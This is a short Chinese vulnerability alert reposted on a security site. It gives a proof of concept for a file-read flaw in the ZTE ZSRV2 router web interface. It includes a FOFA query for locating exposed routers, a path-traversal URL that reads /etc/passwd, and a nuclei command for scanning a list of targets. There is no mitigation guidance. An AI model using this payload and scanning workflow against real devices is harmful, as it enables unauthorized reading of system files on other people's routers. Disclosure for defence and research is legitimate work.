中兴 ZSRV2路由器 文件读取漏洞 POC

admin 2024年9月28日11:14:01评论0 views字数 274阅读0分54秒阅读模式

 

0x03 漏洞描述

中兴 ZSRV2路由器 存在文件读取漏洞。

中兴 ZSRV2路由器 文件读取漏洞 POC

0x04 漏洞复现

fofa:title = ZSRV2路由器Web管理系统

1.执行poc进行/etc/passwd读取,得到结果

http://{{Hostname}}/css//../../../../../../../../etc/passwd

中兴 ZSRV2路由器 文件读取漏洞 POC

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t zhongxing-zsrv2-route-fileread.yaml -l subs.txt -stats

中兴 ZSRV2路由器 文件读取漏洞 POC

   

原文始发于微信公众号(融云攻防实验室):漏洞预警 中兴 ZSRV2路由器 文件读取漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日11:14:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   中兴 ZSRV2路由器 文件读取漏洞 POChttps://cn-sec.com/archives/3102017.html

发表评论

匿名网友 填写信息